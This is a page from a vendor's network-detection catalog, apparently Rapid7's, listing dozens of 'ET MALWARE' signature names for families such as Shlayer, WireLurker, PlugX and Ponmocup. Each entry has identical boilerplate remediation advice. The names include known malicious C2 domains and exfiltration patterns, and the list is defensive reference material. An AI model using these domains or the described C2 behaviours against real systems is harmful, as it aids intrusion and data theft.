Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Flashback.K first execution checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Flashback.K/I reporting failed infection

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Flashback.K/I reporting successful infection

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Flashback.K/I reporting successful infection 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Flashback.K/I User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/GMERA.B CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/LamePyre Screenshot Upload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Mami CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/MapperState CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Mokes.A CnC Heartbeat Request (set)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/NukeSped Variant CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/OceanLotus.D Requesting Commands from CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/OceanLotus.D Sending Data to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Proton.B Domain in SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Proton.C/D Domain (eltima .in in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Proton.C/D Domain (handbrake .cc in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Proton.C/D Domain (handbrakestore .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Shlayer CnC Activity M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Shlayer CnC Activity M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Shlayer CnC Activity M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Shlayer CnC Landing M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Shlayer Malicious Download Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/WireLurker checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/WireLurker Checkin

Description
Copy link

Recommendation
Copy link

ET MALWARE OSX/WireLurker CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE OSX/WireLurker HTTP Request for manhuaba.com.cn

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/WireLurker HTTP Request for www.comeinbaby.com

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/WireLurker User-agent (globalupdate)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/WizardUpdate CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/ZuRu Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Outbound POST Request with Base64 ps PowerShell Command Output M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Outbound POST Request with Base64 ps PowerShell Command Output M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Outbound POST Request with Base64 ps PowerShell Command Output M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Outbound POST Request with ps PowerShell Command Output

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Packed Perl with Eval Statement

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Panda Banker C2 Domain (uiaoduiiej .chimkent .su in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Panda Banker CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Panda Banker Injects Domain (urimchi3dt4 .website in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pandemiya User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Papras Banking Trojan Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Password Stealer - User-Agent (Ucheck)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Patchwork APT CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Patchwork Backdoor Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Patchwork Backdoor - Requesting Task

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Patchwork Backdoor - Sending Task Results

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PawnStorm Sednit DL Aug 28 2015

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PDF 0day Communication - agent UA Feb 14 2013

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Peppy/KeeOIL Google Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Phorpiex Botnet Downloader Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Phorpiex Botnet Downloader Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Phorpiex Botnet Downloader Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Phorpiex Botnet Downloader Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Phorpiex Botnet Downloader Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Phorpiex Botnet Downloader Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PHP Skimmer Exfil Attempt

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PHPs Labyrinth Backdoor Stage1 CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PHPs Labyrinth Backdoor Stage2 CnC Activity M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PHPs Labyrinth Backdoor Stage2 CnC Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Plasmabot CnC Host Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Platinum APT Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Platinum APT - Titanium Hardcoded String Observed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Platinum APT - Titanium Payload CnC Checkin (x64)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Platinum APT - Titanium Payload CnC Checkin (x86)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PLATINUM Dipsind CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE PLATINUM Steganographic HTTP Response Page Inbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Playtech Downloader Online Gaming Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Plead TSCookie CnC Checkin M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Plead TSCookie CnC Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Plead TSCookie CnC Checkin M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Plead TSCookie CnC Checkin M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PlugX Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PlugX Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PlugX/Destory HTTP traffic

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PlugX/Korplug CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PlugX variant

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PNScan.2 Inbound Status Check Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PNScan.2 Inbound Status Check - set

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PoetRAT Upload via HTTP

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Polaris Botnet User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Polaris Botnet User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup C2 Post-infection Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup C2 Sending Data to Controller 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup C2 Sending Data to Controller 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup HTTP Request (generic) M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup HTTP Request (generic) M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup HTTP Request (generic) M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup HTTP Request (generic) M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup HTTP Request (generic) M5

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup HTTP Request (generic) M6

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup HTTP Request (generic) M7

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup HTTP Request (generic) M8

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup HTTP Request (generic) M9

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup Redirection from infected Website to Trojan-Downloader

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pontoeb CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pony Loader default URI struct

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Adwind/jSocket SSL Cert (assylias.Inc)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible APT28 DOC Uploader SSL/TLS Certificate Observed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible APT28 Maldoc CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible APT28 Xtunnel Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible APT29 CozyBear/SeaDaddy SSL/TLS Certificate Observed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible APT30 or Win32/Nuclear HTTP Framework

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible APT34 TONEDEAF 2.0 User-Agent Observed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible APT40/Dadstache Stage 2 Payload Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Possible APT 41 Fake Server Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible APT Sarhurst/Husar/Hussarini/Hassar CnC Check Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible APT Sarhurst/Husar/Hussarini/Hassar CnC Command Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible APT Sarhurst/Husar/Hussarini/Hassar CnC GET

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible APT Sarhurst/Husar/Hussarini/Hassar CnC POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Archie EK Payload Checkin GET

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Asprox Pizza

Description
Copy link

